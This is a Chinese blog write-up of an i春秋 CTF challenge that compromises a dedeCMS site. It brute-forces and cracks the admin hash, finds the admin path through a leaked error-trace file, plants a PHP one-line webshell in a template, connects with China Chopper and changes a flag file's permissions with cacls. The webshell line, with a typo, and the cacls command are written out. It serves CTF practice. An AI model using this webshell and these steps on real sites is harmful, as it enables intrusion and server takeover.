真的很简单 i春秋

最新推荐文章于 2024-11-20 23:53:08 发布
原创 最新推荐文章于 2024-11-20 23:53:08 发布 · 1.2k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

题目描述

在环境里面 浏览器 访问http://file.ichunqiu.com/49ba59ab下载dedeCMS

 下载工具进行爆破

 第一个是账号 、第二个是md5加密 MD5免费在线解密破解_MD5在线加密-SOMD5

 接下来是找后门目录。查找后台地址,手动输了几个常见的,结果不行;用御剑扫了一下,结果也扫不出来

我们进行百度搜索cms相关后台

dedeCMS漏洞:mysqli_error_trace.inc 文件里会残留后台路径。

dedeCMS目录中的data/mysqli_error_trace.inc文件,是记录数据库出错信息。一般是用于网站存在错误,系统自动记录在该文件中,进一步说,就是该文件是记录sql错误信息的文件,类似于日志功能,关键是它会记录后台路径。

然后找到后台 我们利用前面找出的密码 进行登录 

这里看不见有什么有用的信息 

 我们把后面的 链接给删除了

 文件上传

        第一种:

使用源码模板进行修改链接菜刀

 <?php @eval($_POSTT['cmd']);?>;   //这是一个php webshell 一句话木马

 然后我们用菜刀链接

 找到菜刀

 输入刚才修改的模板php文件的路径 

 在里面看不到有用的信息

右键 我们打开虚拟终端 进入到目录查看有没有什么有用的信息

 

cacls flag~ichunqiu.txt /E /P system:F /C

参数说明:

/E:编辑访问控制列表而不替换;

/P user:perm 替换指定用户的访问权限(F是完全控制的意思);

/C:在出现拒绝访问错误时继续。 处理成功后,再一次查看文件访问控制权限,SYSTEM已经修改为F:完全控制,用type命令查看flag文件即可得到答案。

 得到flag

key{i12o31}

python-i春秋验证码识别
dfdhxb995397的博客
04-17 882
i春秋作家:hlpureboy python+机器学习+验证码识别+源码 简单介绍 最近在写某网站的自动注册,在注册的过程中遇到一些问题,如js的执行、验证码的识别等等,今天给大家如何用python通过机器学习的方式实现验证码的识别,这次以i春秋验证码为例进行识别,尽可能的用简单的方式给大家讲解。 使用技术 [x] python 2.7 32 位 所需的库 PIL skle...
i春秋web-Login(细心、注意)
Sea_Sand息禅
05-22 1445
上来就是让登陆,尝试登录页面报错,查看源码得到:<!-- test1 test1 -->,这可能就是登录的账号和密码,果然成功,进入了member.php,但是并没有得到什么有用的信息。 刷新登录后的界面,尝试抓包进行分析,在响应头处发现: 有个show=0,难道是用来显示什么信息的?在请求部分加上show: 1 试了好几个地方,只有show加在Referer前面的时候响应部分...
春秋云境.com】内网极限挑战赛,首批官方认证证书等你来拿
ichunqiu2018的博客
04-06 342
春秋云境.com】内网极限挑战赛,首批官方认证证书等你来拿! 仿真场景一触即发,开启新一年从未体验的畅爽攻克挑战!
CTF学习资源
wutiangui的博客
08-30 2133
MD5MD5(Message Digest Algorithm 5)中文名为消息摘要算法第五版,是计算机安全领域广泛使用的一种散列函数,用以提供消息的完整性保护。MD5作为一种常用的摘要算法(或指纹算法),其具有以下几个重要的特点:输入任意长度信息,输出长度固定:MD5 可输入任意长度的信息,其输出均为128位(bit)固定长度的二进制数据。运算速度快:MD5的运算均为32位 与、或、非、位移等位运算,因此其运算速率快,几乎不消耗CPU时间。
i春秋-CTF-web文件上传
在Web和Reverse坑里游泳中。。。。
04-27 2081
前言 本来吧,悄悄摸鱼,想整点啥打发时间,看视频太明显,于是做做题,眉头紧锁,仔细思考,装作工作很难的样子。 这回选择web类型的题目,主要是好久没做了,手有点生,找个简单的文件上传练练。 打开题目环境发现: 好像是没有什么特别的。 但是往下翻看却是别有洞天。 众所周知,php是后端语言,正常情况下前端是看不到的,也就是说,出题人还是很贴心的(虽然我觉得出题人没那么好心)。 <?php header("Content-Type:text/html; charset=utf.
Bug Bounty Tip - i春秋Self-XSS变废为宝的奇思妙想
04-30
### Bug Bounty Tip - i春秋Self-XSS变废为宝的奇思妙想 #### 0x01 前言 在网络安全领域中,“自我跨站脚本攻击”(Self-XSS)通常被视为一个不起眼的安全问题。然而,在实际应用中,通过巧妙的设计和策略,Self-...
2025 i春秋-春秋杯 冬季赛简单镜像提取
最新发布
01-21
### 2025年i春秋杯冬季赛简单镜像提取方法 对于2025年的i春秋杯冬季赛中涉及的简单镜像提取,可以借鉴以往比赛的经验和技术手段来完成。具体的方法如下: #### 工具准备 为了成功提取镜像文件,需要准备好相应的...
i春秋CTF训练 Web 123 常见的Web源码泄露漏洞 Burpsuite Intruder模块简单应用
椰奶冻不安全的博客
07-05 1136
Web 123 常见的Web源码泄露漏洞 Burpsuite Intruder模块介绍 题目内容:12341234,然后就解开了 本题来自擂主C26 题目链接请在i春秋申请 login.php 源码里发现提示,用户名+出生年份就是密码,用zhangwei和zhangwei1999试了一下,没错当然登陆失败,只能再想办法了 常见的Web源码泄露漏洞 git源码泄露 Git是一个开源的分布式版本控制系统,每次执行初始化目录的时候会在当前目录下自动创建一个.git目录,用于记录代码的变更记录等 s
python验证码识别爆破_python-i春秋验证码识别
weixin_39781143的博客
12-09 337
python+机器学习+验证码识别+源码简单介绍最近在写某网站的自动注册,在注册的过程中遇到一些问题,如js的执行、验证码的识别等等,今天给大家如何用python通过机器学习的方式实现验证码的识别,这次以i春秋验证码为例进行识别,尽可能的用简单的方式给大家讲解。使用技术[x] python 2.7 32 位 所需的库 PIL sklearn numpy pandas matplotlib[x] 数...
Struts 2 远程代码执行漏洞(s2-045\s2-046)修复所用到的包
03-23
1.严格过滤 Content-Type 、filename里的内容,严禁ognl表达式相关字段。 2.如果您使用基于Jakarta插件,请升级到Apache Struts 2.3.32或2.5.10.1版本。(强烈推荐) 3.升级到2.3.32所用到的jar包: freemarker-2.3.22.jar ognl-3.0.19.jar struts2-convention-plugin-2.3.32.jar struts2-core-2.3.32.jar struts2-spring-plugin-2.3.32.jar xwork-core-2.3.32.jar --来源 http://mvnrepository.com/artifact/org.apache.struts/struts2-spring-plugin/2.3.32
i 春秋月刊 第 1 期到第 5 期
11-16
第一期:Python 应用 第二、三期:代码审计 第四期:SQL 注入 第五期:XSS
i春秋SRC部落携手同程SRC发布首届漏洞提交任务
chengman3837的博客
04-20 311
【部落守卫者集结令】 拿巨额奖金?上白帽子排行榜?近距离膜拜大佬?学技术?掌握窍门?又或者你是个责任感爆棚想要互联网行业安全的有志青年?加入i春秋部落守卫者(The Guarders),统统满足你! 【尊享特权】 凡是成功通过筛选机制成为i春秋部落守卫者联盟一员的白帽子都将有机会获得以下...
逻辑漏洞之任意密码重置
weixin_33716557的博客
05-16 298
本文总结自i春秋课程,仅为方便记忆查询 源视屏链接 1.验证码不失效 原因: 找回密码时,获取的验证码缺少时间限制 仅判断了验证码是否正确,未判断验证码是否过期 测试方法: 通过Burp枚举找到真正的验证码 2.验证码直接返回 原因: 输入手机号后点击获取验证码,验证码在客户端生成 并直接返回Response以方便对接下来的验证码进行比对 测试方法: 直接输入目标手机号,...
i春秋-ctf 文件上传
AAAAAAAAAAAA66的博客
11-08 9618
文章目录 前言 一、题目 二、解题步骤 1.我的错误思路 2.正确解题姿势 总结 前言 CTF小白,这道题思考了很久,i春秋上现在也没write up,卡了1天了,后面在buuctf找到了题解答。通过这一天让我对文件上传有了更深的理解。 目录 文章目录 一、题目进入环境。 二、解题步骤 1.我的错误思路 2.​​​​​​正确解题姿势 总结 一道普通的文件上传题,通过一天的思考我得到这类题目的思路总结。 提示:以下是本篇文章正文内容,下
i春秋-123(文件上传绕过,双写绕过)
2301_79090248的博客
11-20 611
zhangyuzhen1995 1.绕过<?限制2.绕过<?pgp?>限制。
CTF学习记录 i春秋 《从0到1:CTFer成长之路》文件上传
mastergu2的博客
10-21 4387
21.10.19 第二次开始学习CTF 感觉很有收获 至少有让自己忙起来了的感觉 感觉有一些学习状态了 打算重新记录一下学习笔记!加油 我会坚持下去的! 题目代码 首先附上题目的代码段(不完整) show_source(__FILE__); }else{ $file = $_FILES['file']; if(!$file){ exit("请勿上传空文件"); } $name = $file['name']; $dir = 'upload/
暑期web10:基础的文件上传upload(i春秋)、上传绕过(实验吧)
qq_41618162的博客
08-18 2893
介于之前做了个包括文件上传步骤的题,突然想拿两个之前做过的文件上传题来回顾一下一些基础做法 首先是实验吧的上传绕过 首先我们上传最基础的一句话木马:&amp;lt;?php @eval($_POST['pass']);?&amp;gt; 反馈是‘不被允许的文件类型,仅支持上传jpg,gif,png后缀的文件’ 于是我把他的后缀改为.jpg再上传,又回显‘必须上传后缀名为php的文件才行’ 做成php...
i春秋WEB之Upload
金 帛的博客
02-12 533
i春秋webWP
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小晨_WEB

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值